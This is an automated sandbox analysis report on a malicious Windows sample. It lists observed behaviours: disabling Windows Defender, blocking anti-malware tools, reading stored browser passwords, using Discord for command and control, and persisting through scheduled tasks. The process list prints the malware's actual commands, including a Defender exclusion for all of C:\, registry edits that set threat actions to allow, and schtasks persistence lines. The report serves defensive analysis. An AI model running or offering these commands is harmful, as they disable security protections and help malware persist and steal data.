Analysis Overview
SHA256
3412cec072f1a9b403fcc7d2e8de28d0bde2d3a5a2e39089c519c2d12646b644
Threat Level: Known bad
The file 1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Modifies security service
Suspicious use of NtCreateUserProcessOtherParentProcess
Modifies Windows Defender notification settings
Detected Nirsoft tools
NirSoft WebBrowserPassView
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Possible privilege escalation attempt
Blocks application from running via registry modification
Loads dropped DLL
Checks BIOS information in registry
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
Indicator Removal: Clear Windows Event Logs
Modifies file permissions
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Suspicious use of SetThreadContext
Drops file in System32 directory
UPX packed file
Drops file in Windows directory
Enumerates physical storage devices
Browser Information Discovery
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious behavior: CmdExeWriteProcessMemorySpam
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Modifies registry class
Kills process with taskkill
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-10-07 10:38
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-07 10:38
Reported
2024-10-07 10:41
Platform
win7-20240729-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP | C:\Windows\System32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1608 created 432 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 1516 created 432 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "MBSetup.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "mbar.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "rkill.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "rkill32.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "mbam.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MRT.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "rkill64.exe" | C:\Windows\system32\reg.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\$77main1.exe | N/A |
| N/A | N/A | C:\Users\$77Redownloader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\winhlp32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\splwow64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hh.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xwizard.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api64.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api64.ipify.org | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\Recovery | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | C:\Windows\system32\ReAgentc.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1608 set thread context of 1740 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 1516 set thread context of 1392 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\SysWOW64\dllhost.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\$77svc64.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| File opened for modification | C:\Windows\Tasks\$77svc64.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| File opened for modification | C:\Windows\Tasks\$77svc64.job | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\appcompat\programs\RecentFileCache.bcf | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Tasks\$77svc32.job | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\Tasks\$77svc32.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| File opened for modification | C:\Windows\Tasks\$77svc32.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\winhlp32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\splwow64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\$77Redownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\hh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\xwizard.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\$77main1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0d04b1da518db01 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\$77Redownloader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\winhlp32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\splwow64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hh.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xwizard.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\$77Redownloader.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe"
C:\Users\$77main1.exe
"C:\Users\$77main1.exe" 0
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B635.tmp\B636.tmp\B637.bat C:\Users\$77main1.exe 0"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1751213302-1385746122110234050-934115374-8464557901720287217-1526424837-1330299757"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath 'C:\' -Force
C:\Users\$77Redownloader.exe
"C:\Users\$77Redownloader.exe" -o"C:\Users\Admin\AppData\Local\Microsoft\Windows" -y
C:\Windows\system32\reg.exe
Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatIdDefaultAction" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147772079" /t REG_SZ /d "6" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147735505" /t REG_SZ /d "6" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147745502" /t REG_SZ /d "6" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t "REG_DWORD" /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "5" /t "REG_SZ" /d "6" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "1" /t "REG_SZ" /d "6" /f
C:\Windows\system32\timeout.exe
timeout 10
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe"
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /RU Admin /create /tn "$77Stellacy.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /sc minute /mo 1 /RL HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /RU Admin /create /tn "$77SX.job" /tr "'C:\Windows\System32\Wscript.exe'C:\Users\Admin\AppData\Local\Microsoft\Windows\$77vbs.vbs" /sc minute /mo 40 /RL HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks /RU Admin /create /tn "$77STLR.job" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe" /sc onstart /RL HIGHEST /f
C:\Windows\system32\timeout.exe
timeout 10
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "$77Quasar.job" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4cciCKuj10fS4tEFtsNPmrL/0jPo2AcIdfc9jK0U15Lp5iXQGku3ZLiCUn4WwDSh+A0ftN5CXUAmVy5X4PPHFWMzuIK7S46Iv9KhQeGUN+idJw7zi086Au7DP0yct2lQY=
C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe"
C:\Windows\system32\timeout.exe
timeout 20
C:\Windows\system32\taskeng.exe
taskeng.exe {3BA54D79-45F1-4612-983D-2FA617B33DF7} S-1-5-18:NT AUTHORITY\System:Service:
